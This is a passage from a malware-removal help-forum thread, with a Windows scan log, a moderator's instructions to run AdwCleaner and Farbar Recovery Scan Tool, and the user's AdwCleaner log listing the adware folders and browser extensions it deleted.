[1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]
 
========== Files - Modified Within 30 Days ==========
 
[2014.08.09 23:01:00 | 000,000,254 | ---- | M] () -- C:\Windows\tasks\HP Photo Creations Messager.job
[2014.08.09 22:36:10 | 000,000,986 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job
[2014.08.09 22:34:06 | 000,001,028 | ---- | M] () -- C:\Windows\tasks\CocCocUpdateTaskUserS-1-5-21-4169419405-2626366916-160398126-1007UA.job
[2014.08.09 19:36:00 | 000,000,982 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job
[2014.08.09 19:34:00 | 000,001,932 | ---- | M] () -- C:\Windows\tasks\VisualBee-chromeinstaller.job
[2014.08.09 19:34:00 | 000,001,856 | ---- | M] () -- C:\Windows\tasks\VisualBee-firefoxinstaller.job
[2014.08.09 19:34:00 | 000,001,228 | ---- | M] () -- C:\Windows\tasks\VisualBee-codedownloader.job
[2014.08.09 19:34:00 | 000,001,222 | ---- | M] () -- C:\Windows\tasks\VisualBee-updater.job
[2014.08.09 19:34:00 | 000,001,128 | ---- | M] () -- C:\Windows\tasks\VisualBee-enabler.job
[2014.08.09 17:34:02 | 000,000,976 | ---- | M] () -- C:\Windows\tasks\CocCocUpdateTaskUserS-1-5-21-4169419405-2626366916-160398126-1007Core.job
[2014.08.09 15:30:40 | 000,001,013 | ---- | M] () -- C:\Users\Public\Desktop\TeamViewer 9.lnk
[2014.08.09 15:24:47 | 000,010,240 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
[2014.08.09 15:24:47 | 000,010,240 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
[2014.08.09 15:15:28 | 000,000,320 | ---- | M] () -- C:\Windows\tasks\Start Registry Reviver for FAMILIE-LE-NB@PhanCo(logon).job
[2014.08.09 15:15:09 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat
[2014.08.09 15:14:56 | 2962,243,584 | -HS- | M] () -- C:\hiberfil.sys
[1 C:\Windows\*.tmp files -> C:\Windows\*.tmp -> ]
 
========== Files Created - No Company Name ==========
 
[2014.02.25 21:22:57 | 000,000,408 | ---- | C] () -- C:\Users\Papa\AppData\Roaming\CamShapes.ini
[2014.02.25 21:22:57 | 000,000,408 | ---- | C] () -- C:\Users\Papa\AppData\Roaming\CamLayout.ini
[2014.02.25 21:22:57 | 000,000,068 | ---- | C] () -- C:\Users\Papa\AppData\Roaming\Camdata.ini
[2014.02.25 21:22:33 | 000,004,535 | ---- | C] () -- C:\Users\Papa\AppData\Roaming\CamStudio.cfg
[2014.02.25 21:10:19 | 000,000,096 | ---- | C] () -- C:\Users\Papa\AppData\Roaming\version2.xml
[2014.01.12 22:05:27 | 000,366,611 | ---- | C] () -- C:\Users\Papa\AppData\Local\mysearchdial-speeddial.crx
[2013.10.30 10:37:20 | 000,158,989 | ---- | C] () -- C:\Windows\SysWow64\vtcvnpt2.sys
[2013.10.30 10:37:20 | 000,028,558 | ---- | C] () -- C:\Windows\SysWow64\vtcvnpt3.sys
[2013.10.30 10:37:20 | 000,027,480 | ---- | C] () -- C:\Windows\SysWow64\vtcvnpt1.sys
[2013.10.30 10:37:18 | 000,000,007 | ---- | C] () -- C:\Windows\SysWow64\convnpt1.ini
[2013.09.28 22:59:00 | 000,103,736 | ---- | C] () -- C:\Windows\SysWow64\PnkBstrB.exe
[2013.09.28 22:58:43 | 000,669,184 | ---- | C] () -- C:\Windows\SysWow64\pbsvc.exe
[2013.09.23 21:20:37 | 000,000,293 | ---- | C] () -- C:\Windows\game.ini
[2013.09.01 21:49:49 | 000,000,291 | ---- | C] () -- C:\Windows\cod2demo.ini
[2013.05.03 19:12:09 | 000,000,092 | ---- | C] () -- C:\Users\Papa\AppData\Local\fusioncache.dat
[2013.05.01 21:10:02 | 001,668,074 | ---- | C] () -- C:\Windows\SysWow64\PerfStringBackup.INI
[2012.10.05 17:27:16 | 000,704,000 | ---- | C] () -- C:\Windows\SysWow64\ContentDirectoryPresenter.dll
[2012.08.21 11:26:16 | 000,046,592 | ---- | C] () -- C:\Windows\SysWow64\boost_thread-vc90-mt-1_47.dll
[2012.08.21 11:26:04 | 000,038,912 | ---- | C] () -- C:\Windows\SysWow64\boost_date_time-vc90-mt-1_47.dll
[2012.08.21 11:25:52 | 000,704,000 | ---- | C] () -- C:\Windows\SysWow64\boost_regex-vc90-mt-1_47.dll
[2012.08.21 11:25:52 | 000,227,840 | ---- | C] () -- C:\Windows\SysWow64\boost_serialization-vc90-mt-1_47.dll
[2012.08.21 11:25:50 | 000,012,800 | ---- | C] () -- C:\Windows\SysWow64\boost_system-vc90-mt-1_47.dll
[2012.08.21 11:25:48 | 000,130,048 | ---- | C] () -- C:\Windows\SysWow64\boost_filesystem-vc90-mt-1_47.dll
[2012.08.14 11:42:22 | 000,025,600 | ---- | C] () -- C:\Windows\SysWow64\MediaDB.dll
[2012.02.22 23:24:19 | 000,000,057 | ---- | C] () -- C:\ProgramData\Ament.ini
[2012.01.17 22:41:43 | 000,000,680 | RHS- | C] () -- C:\Users\Papa\ntuser.pol
[2011.08.05 17:58:08 | 000,000,268 | RH-- | C] () -- C:\ProgramData\SingleFiles
[2011.08.05 17:58:08 | 000,000,268 | RH-- | C] () -- C:\ProgramData\Services
[2011.08.05 17:58:08 | 000,000,268 | RH-- | C] () -- C:\ProgramData\Scripts Menu
[2011.08.05 17:58:08 | 000,000,268 | RH-- | C] () -- C:\Users\Papa\AppData\Roaming\Screen Saver
[2011.08.05 17:58:08 | 000,000,268 | RH-- | C] () -- C:\Users\Papa\AppData\Roaming\Sci-Fi
[2011.08.05 17:58:08 | 000,000,268 | RH-- | C] () -- C:\Users\Papa\AppData\Roaming\Sampler Instruments
[2011.08.05 17:58:08 | 000,000,020 | -H-- | C] () -- C:\ProgramData\PKP_DLev.DAT
[2011.08.05 17:58:08 | 000,000,020 | -H-- | C] () -- C:\ProgramData\PKP_DLet.DAT
[2011.08.05 17:58:08 | 000,000,020 | -H-- | C] () -- C:\ProgramData\PKP_DLes.DAT
[2011.08.05 17:58:08 | 000,000,012 | RH-- | C] () -- C:\ProgramData\StatusSheet
[2011.08.05 17:58:08 | 000,000,012 | RH-- | C] () -- C:\ProgramData\StartupItems
[2011.08.05 17:58:08 | 000,000,012 | RH-- | C] () -- C:\ProgramData\Standard
[2011.03.05 22:13:29 | 000,012,292 | -H-- | C] () -- C:\Users\Papa\.DS_Store
[2011.01.02 19:03:16 | 000,007,597 | ---- | C] () -- C:\Users\Papa\AppData\Local\Resmon.ResmonCfg
[2010.07.02 18:41:30 | 000,131,984 | ---- | C] () -- C:\ProgramData\FullRemove.exe
[2009.04.09 19:44:42 | 000,108,066 | R--- | C] () -- C:\ProgramData\DeviceManager.xml.rc4
 
========== ZeroAccess Check ==========
 
[2009.07.14 11:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
 
[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64
 
[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2012.06.09 12:30:56 | 014,165,504 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2012.06.09 11:46:56 | 012,868,608 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2009.07.14 08:40:51 | 000,909,312 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2009.07.14 08:15:20 | 000,605,696 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free
 
[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2009.07.14 08:41:56 | 000,505,856 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]
 
========== LOP Check ==========
 
[2014.01.12 22:15:30 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\.minecraft
[2014.03.12 20:37:33 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Aeria Games & Entertainment
[2014.06.25 20:36:31 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\AppRevels.com
[2009.01.05 06:02:16 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\AVAST Software
[2013.04.26 21:50:09 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\BabSolution
[2013.04.26 21:48:48 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Babylon
[2014.03.24 22:06:58 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Bechiro S.L
[2013.11.08 01:13:29 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Bundysoft
[2014.06.27 13:18:54 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\com.erclab.air.phototransferapp
[2010.11.28 12:59:18 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Command & Conquer 3 Kane's Wrath
[2010.12.02 16:01:19 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Command and Conquer 4
[2013.01.31 20:44:21 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\CSMPlay
[2013.05.01 23:28:24 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\DAEMON Tools Lite
[2011.05.13 23:29:32 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\DAEMON Tools Pro
[2013.09.01 17:54:46 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\DefaultTab
[2013.04.26 21:49:41 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Delta
[2014.06.27 13:39:15 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\DMCache
[2012.02.18 00:05:11 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\DVDVideoSoft
[2012.02.18 00:05:05 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\DVDVideoSoftIEHelpers
[2013.04.26 21:48:37 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\ExpressFiles
[2014.02.22 23:45:50 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Garena
[2014.02.23 11:24:24 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\GarenaPlus
[2013.05.07 19:11:06 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\GoforFiles
[2011.10.30 21:11:51 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Haufe Mediengruppe
[2011.03.19 15:17:46 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\ICAClient
[2014.06.25 11:03:38 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\IDM
[2014.08.09 21:45:15 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\install
[2010.11.16 02:30:03 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Leadertech
[2013.08.05 14:51:01 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\LEGO Company
[2011.10.24 21:53:56 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Lexware
[2014.02.22 23:46:17 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\LolClient
[2014.06.07 23:48:40 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\MCommon
[2013.11.01 19:34:59 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Mount&Blade
[2013.10.29 18:55:43 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Mount&Blade Warband
[2014.01.12 22:05:30 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\mysearchdial
[2013.06.07 13:20:45 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\NCdownloader
[2011.11.25 22:12:48 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Nikon
[2013.11.23 13:28:30 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\OpenCandy
[2012.11.11 10:59:38 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\PowerCinema
[2014.04.02 16:27:59 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\rmi
[2013.11.07 21:21:53 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Smart PC Cleaner
[2013.11.04 19:00:59 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Sony
[2013.12.19 18:09:58 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\SYSTEMAX Software Development
[2014.06.25 11:01:50 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\TeamViewer
[2012.06.15 21:18:32 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Telefónica
[2014.06.09 23:05:42 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Telerik
[2011.10.13 21:42:53 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Tencent
[2014.06.25 20:39:38 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\tiger-k
[2013.01.20 16:18:07 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Ubisoft
[2013.09.02 14:05:02 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\uTorrent
[2011.10.13 21:42:53 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\VinaGame
[2010.11.14 19:30:42 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Vodafone
[2014.06.25 10:33:01 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\webnavi
[2013.09.13 19:33:18 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\WinLive
[2014.03.30 17:58:33 | 000,000,000 | ---D | M] -- C:\Users\Papa\AppData\Roaming\Yontoo
 
========== Purity Check ==========
 
 
 
========== Files - Unicode (All) ==========
(C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Quy?n Vương Online) -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Quyền Vương Online
 
========== Alternate Data Streams ==========
 
@Alternate Data Stream - 149 bytes -> C:\ProgramData\Temp:CDFF58FE
@Alternate Data Stream - 144 bytes -> C:\ProgramData\Temp:5D7E5A8F
@Alternate Data Stream - 141 bytes -> C:\ProgramData\Temp:E36F5B57
@Alternate Data Stream - 135 bytes -> C:\ProgramData\Temp:E1F04E8D
@Alternate Data Stream - 134 bytes -> C:\ProgramData\Temp:1A60DE96
@Alternate Data Stream - 119 bytes -> C:\ProgramData\Temp:4D066AD2
 
< End of report >
 

  • 0

Advertisements


#2
Essexboy

Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts
Hi there, using cracks is bad juju as they generally come with additional unwanted extras. Uninstall the crack please and then do the following

Please download AdwCleaner by Xplode onto your desktop.
  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click on Scan.
  • After the scan is complete click on "Clean"
  • Confirm each time with Ok.
  • Your computer will be rebooted automatically. A text file will open after the restart.
  • Please post the content of that logfile with your next answer.
  • You can find the logfile at C:\AdwCleaner[S1].txt as well.
THEN

Please download Farbar Recovery Scan Tool and save it to your Desktop.

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.
  • Right click to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer.
  • Select additions at the bottom
  • Press Scan button.
    frst.JPG
  • It will produce a log called FRST.txt in the same directory the tool is run from.
  • Please attach both logs generated.

  • 0

#3
langvu900

langvu900

    Member

  • Topic Starter
  • Member
  • PipPip
  • 11 posts

Hello, i did it but i got a file name AdwCleaner[0].txt hope it's the right one. Here it is:

 

# AdwCleaner v3.304 - Bericht erstellt am 12/08/2014 um 17:57:07

# Aktualisiert 08/08/2014 von Xplode
# Betriebssystem : Windows 7 Home Premium  (64 bits)
# Benutzername : Papa - FAMILIE-LE-NB
# Gestartet von : C:\Users\PhanCo.FAMILIE-LE-NB\Desktop\AdwCleaner.exe
# Option : Löschen
 
***** [ Dienste ] *****
 
[x] Nicht Gelöscht : DefaultTabUpdate
 
***** [ Dateien / Ordner ] *****
 
Ordner Gelöscht : C:\ProgramData\Babylon
Ordner Gelöscht : C:\ProgramData\BetterSoft
Ordner Gelöscht : C:\ProgramData\BitGuard
Ordner Gelöscht : C:\ProgramData\BonanzaDealsLive
Ordner Gelöscht : C:\ProgramData\FileCure
Ordner Gelöscht : C:\ProgramData\Partner
Ordner Gelöscht : C:\ProgramData\StarApp
Ordner Gelöscht : C:\ProgramData\Tarma Installer
Ordner Gelöscht : C:\ProgramData\Tencent
Ordner Gelöscht : C:\ProgramData\VisualBee
Ordner Gelöscht : C:\ProgramData\contaiynuettosaovve
Ordner Gelöscht : C:\ProgramData\greaTsavear
Ordner Gelöscht : C:\ProgramData\savenshAriE
Ordner Gelöscht : C:\ProgramData\Soearachh-NewTiaabi
Ordner Gelöscht : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Optimizer Pro
Ordner Gelöscht : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SkypEmoticons
Ordner Gelöscht : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\smart pc cleaner
Ordner Gelöscht : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Soearachh-NewTiaabi
Ordner Gelöscht : C:\Program Files (x86)\BonanzaDeals
Ordner Gelöscht : C:\Program Files (x86)\BonanzaDealsLive
Ordner Gelöscht : C:\Program Files (x86)\Conduit
Ordner Gelöscht : C:\Program Files (x86)\continuetosave
Ordner Gelöscht : C:\Program Files (x86)\DefaultTab
Ordner Gelöscht : C:\Program Files (x86)\Delta
Ordner Gelöscht : C:\Program Files (x86)\driver-soft
Ordner Gelöscht : C:\Program Files (x86)\FilesFrog Update Checker
Ordner Gelöscht : C:\Program Files (x86)\GreenTree Applications
Ordner Gelöscht : C:\Program Files (x86)\Minibar
Ordner Gelöscht : C:\Program Files (x86)\MyPC Backup
Ordner Gelöscht : C:\Program Files (x86)\Mysearchdial
Ordner Gelöscht : C:\Program Files (x86)\Optimizer Pro
Ordner Gelöscht : C:\Program Files (x86)\Red Sky
Ordner Gelöscht : C:\Program Files (x86)\SafeSaver
Ordner Gelöscht : C:\Program Files (x86)\smart pc cleaner
Ordner Gelöscht : C:\Program Files (x86)\ss helper
Ordner Gelöscht : C:\Program Files (x86)\Vittalia
Ordner Gelöscht : C:\Program Files (x86)\WebSearch
Ordner Gelöscht : C:\Program Files (x86)\WebSparkle
Ordner Gelöscht : C:\Program Files (x86)\Yontoo
Ordner Gelöscht : C:\Program Files (x86)\greaTsavear
Ordner Gelöscht : C:\Program Files (x86)\Common Files\DVDVideoSoft\TB
Ordner Gelöscht : C:\Users\Administrator\AppData\Local\torch
Ordner Gelöscht : C:\Users\ASPNET\AppData\Local\torch
Ordner Gelöscht : C:\Users\Gast\AppData\Local\torch
Ordner Gelöscht : C:\Users\HomeGroupUser$\AppData\Local\torch
Ordner Gelöscht : C:\Users\Kenh\AppData\Local\torch
Ordner Gelöscht : C:\Users\Kenh\AppData\LocalLow\contaiynuettosaovve
Ordner Gelöscht : C:\Users\Kenh\AppData\LocalLow\Soearachh-NewTiaabi
Ordner Gelöscht : C:\Users\Kenh\AppData\Roaming\NCdownloader
Ordner Gelöscht : C:\Users\Mama\AppData\Local\torch
Ordner Gelöscht : C:\Users\Papa\AppData\Local\BonanzaDealsLive
Ordner Gelöscht : C:\Users\Papa\AppData\Local\Conduit
Ordner Gelöscht : C:\Users\Papa\AppData\Local\Minibar
Ordner Gelöscht : C:\Users\Papa\AppData\Local\Mobogenie
Ordner Gelöscht : C:\Users\Papa\AppData\Local\torch
Ordner Gelöscht : C:\Users\Papa\AppData\Local\Temp\mt_ffx
Ordner Gelöscht : C:\Users\Papa\AppData\Local\Temp\Tencent
Ordner Gelöscht : C:\Users\Papa\AppData\LocalLow\Conduit
Ordner Gelöscht : C:\Users\Papa\AppData\LocalLow\Minibar
Ordner Gelöscht : C:\Users\Papa\AppData\LocalLow\PriceGong
Ordner Gelöscht : C:\Users\Papa\AppData\LocalLow\contaiynuettosaovve
Ordner Gelöscht : C:\Users\Papa\AppData\LocalLow\Soearachh-NewTiaabi
Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\BabSolution
Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\Babylon
Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\DefaultTab
Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\Delta
Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\dvdvideosoftiehelpers
Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\ExpressFiles
Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\goforfiles
Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\Mysearchdial
Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\NCdownloader
Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\OpenCandy
Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\SkypEmoticons
Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\smart pc cleaner
Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\Tencent
Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\WebNavi
Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\Yontoo
Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BitGuard
Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FilesFrog Update Checker
Ordner Gelöscht : C:\Users\Papa\Documents\Mobogenie
Ordner Gelöscht : C:\Users\Papa\Documents\smart pc cleaner
Ordner Gelöscht : C:\Users\PhanCo\AppData\LocalLow\Conduit
Ordner Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\DownTango
Ordner Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\torch
Ordner Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\LocalLow\contaiynuettosaovve
Ordner Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\LocalLow\Soearachh-NewTiaabi
Ordner Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Roaming\ExpressFiles
Ordner Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Roaming\hotspot shield
Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\Extensions\{635abd67-4fe9-1b23-4f01-e679fa7484c1}
Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\Extensions\{97A78363-B868-4B48-AC91-A783A31215AF}
Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\Extensions\{ACAA314B-EEBA-48E4-AD47-84E31C44796C}
Ordner Gelöscht : C:\Users\Gast\AppData\Roaming\Mozilla\Firefox\Profiles\rqefd106.default\Extensions\{ad9a41d2-9a49-4fa6-a79e-71a0785364c8}
Ordner Gelöscht : C:\Users\Kenh\AppData\Roaming\Mozilla\Firefox\Profiles\aeqtjz41.default\Extensions\{ad9a41d2-9a49-4fa6-a79e-71a0785364c8}
Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\Extensions\{ad9a41d2-9a49-4fa6-a79e-71a0785364c8}
Ordner Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Roaming\Mozilla\Firefox\Profiles\1evgh2ff.default\Extensions\{ad9a41d2-9a49-4fa6-a79e-71a0785364c8}
Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\Extensions\[email protected]
Ordner Gelöscht : C:\Users\Gast\AppData\Roaming\Mozilla\Firefox\Profiles\rqefd106.default\Extensions\[email protected]
Ordner Gelöscht : C:\Users\Kenh\AppData\Roaming\Mozilla\Firefox\Profiles\aeqtjz41.default\Extensions\[email protected]
Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\Extensions\[email protected]
Ordner Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Roaming\Mozilla\Firefox\Profiles\1evgh2ff.default\Extensions\[email protected]
Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\Extensions\[email protected]
Ordner Gelöscht : C:\Users\Kenh\AppData\Roaming\Mozilla\Firefox\Profiles\aeqtjz41.default\Extensions\67314b39-24e6-4f05-99f3-3f88c7cddd17@6c5fa560-13a3-4d42-8e90-53d9930111f9.com
Ordner Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\Extensions\67314b39-24e6-4f05-99f3-3f88c7cddd17@6c5fa560-13a3-4d42-8e90-53d9930111f9.com
Ordner Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Roaming\Mozilla\Firefox\Profiles\1evgh2ff.default\Extensions\67314b39-24e6-4f05-99f3-3f88c7cddd17@6c5fa560-13a3-4d42-8e90-53d9930111f9.com
Ordner Gelöscht : C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\eooncjejnppfjjklapaamhcdmjbilmde
Ordner Gelöscht : C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\flcjcajklmlbpmgckpcmnampagbhhmcp
Ordner Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Google\Chrome\User Data\Default\Extensions\flcjcajklmlbpmgckpcmnampagbhhmcp
Ordner Gelöscht : C:\Users\Kenh\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc
Ordner Gelöscht : C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc
Ordner Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Google\Chrome\User Data\Default\Extensions\kdidombaedgpfiiedeimiebkmbilgmlc
Ordner Gelöscht : C:\Users\Kenh\AppData\Local\Google\Chrome\User Data\Default\Extensions\niapdbllcanepiiimjjndipklodoedlc
Ordner Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\AppData\Local\Google\Chrome\User Data\Default\Extensions\niapdbllcanepiiimjjndipklodoedlc
Ordner Gelöscht : C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\nohfdhapjjlndfgjnmdlcabloeembdkj
Ordner Gelöscht : C:\Users\Papa\AppData\Local\Google\Chrome\User Data\Default\Extensions\pflphaooapbgpeakohlggbpidpppgdff
Ordner Gelöscht : C:\Users\Kenh\AppData\Local\Google\Chrome\User Data\Default\Extensions\kmkdohofefokfmbnlbgebdapndacfklg
Datei Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\Extensions\[email protected]
Datei Gelöscht : C:\Users\Papa\daemonprocess.txt
Datei Gelöscht : C:\Users\Papa\AppData\Local\mysearchdial-speeddial.crx
Datei Gelöscht : C:\Users\Papa\AppData\Local\Temp\Uninstall.exe
Datei Gelöscht : C:\Users\Papa\Desktop\Check for Updates.lnk
Datei Gelöscht : C:\Users\Papa\Desktop\Smart PC Cleaner.lnk
Datei Gelöscht : C:\Users\PhanCo.FAMILIE-LE-NB\daemonprocess.txt
Datei Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\bProtector_extensions.rdf
Datei Gelöscht : C:\Users\Papa\AppData\Roaming\Mozilla\Firefox\Profiles\12lc5kq6.default\bprotector_extensions.sqlite
